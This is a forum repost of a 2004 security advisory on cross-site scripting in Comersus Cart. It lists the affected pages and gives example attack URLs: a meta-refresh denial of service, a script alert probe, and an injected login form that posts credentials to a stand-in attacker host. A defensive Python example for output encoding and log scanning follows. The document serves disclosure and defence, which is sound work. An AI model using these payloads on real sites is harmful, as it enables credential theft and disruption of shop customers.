Full Version: Comersus Cart Cross-site Scripting Vulnerability
qcred11
Jul 7 2004, 07:04 PM
QUOTE


Release Date:
July 6, 2004

Severity:
High

Vendor:
Comersus Open Technologies

Software:
Tested on Comersus Cart 5.09
Previous versions may also be affected.

Remote:
Remotely executed from any web browser

Technical Details:
The malicious user is able to compromise the parameters to invoke a
Cross-Site Scripting attack. This can be used to take advantage of the trust
between a client and server allowing the malicious user to execute malicious
JavaScript on the client's machine or perform a denial of service shutting
down IIS.

Pages Affected:
/comersus/store/comersus_customerAuthenticateForm.asp
/comersus/backofficeLite/comersus_backoffice_message.asp
/comersus/store/comersus_supportError.asp
/comersus/store/comersus_message.asp


Examples:


Denial of Service:
http://[VICTIM]/comersus/store/comersus_message.asp?message=<meta%20http-equiv='refresh'content='0'>


Phishing:
http://[VICTIM]/comersus/store/comersus_message.asp?message=<form%20action="http://www.evilhacker.com/save2db.asp"...<input%20name="username"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login"></form>


XSS:
http://[VICTIM]/comersus/backofficeLite/comersus_backoffice_message.asp?message=<script>alert("VULNERABLE_TO_XSS")</script>



Vendor Status:
Upgrade to 5.098
http://www.comersus.com/


Credit:
Discovered By: Thomas Ryan
Provide Security




Source: http://seclists.org/lists/bugtraq/2004/Jul/0071.html
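As an added defender-side example (not part of the advisory, and not Comersus code): a constructed model of a message page showing the raw echo beside the entity-encoded fix, plus a check over constructed IIS-style log lines for requests to the affected pages whose message parameter carries markup. The page paths come from the advisory; the log format, field order and sample lines are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, unquote

# Pages named in the advisory (lower-cased); markup in ?message= here is suspect.
AFFECTED_PAGES = {
    "/comersus/store/comersus_customerauthenticateform.asp",
    "/comersus/backofficelite/comersus_backoffice_message.asp",
    "/comersus/store/comersus_supporterror.asp",
    "/comersus/store/comersus_message.asp",
}
TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)", re.ASCII)  # any tag name


def render_message(message: str, encode: bool = True) -> str:
    """Constructed model of a page echoing 'message' into HTML: encode=False is the
    vulnerable raw echo, encode=True entity-encodes first (cf. Server.HTMLEncode)."""
    body = html.escape(message, quote=True) if encode else message
    return f"<html><body><p>{body}</p></body></html>"


def suspicious_requests(log_lines):
    """Scan IIS W3C-style lines (date time c-ip method uri-stem uri-query status) and
    return (uri-stem, tags) where an affected page's decoded 'message' holds markup."""
    hits = []
    for line in log_lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        stem, query = fields[4].lower(), fields[5]
        if stem not in AFFECTED_PAGES or query == "-":
            continue
        for value in parse_qs(query, keep_blank_values=True).get("message", []):
            # parse_qs decoded once; unquote again so double-encoding is not missed.
            tags = sorted({t.lower() for t in TAG_RE.findall(unquote(value))})
            if tags:
                hits.append((stem, tags))
    return hits


# Constructed sample log; payload shapes mirror the advisory's examples.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-07-06 10:00:01 192.0.2.10 GET /comersus/store/comersus_message.asp message=Order+received 200
2004-07-06 10:00:02 192.0.2.11 GET /comersus/store/comersus_message.asp message=<meta%20http-equiv='refresh'%20content='0'> 200
2004-07-06 10:00:03 192.0.2.12 GET /comersus/backofficeLite/comersus_backoffice_message.asp message=%3Cscript%3Ealert(1)%3C/script%3E 200
2004-07-06 10:00:04 192.0.2.13 GET /comersus/store/default.asp message=<b>x</b> 200
""".splitlines()
```

Only the two requests to advisory-listed pages with tags in the decoded value are reported; the benign message and the request to an unrelated page are not.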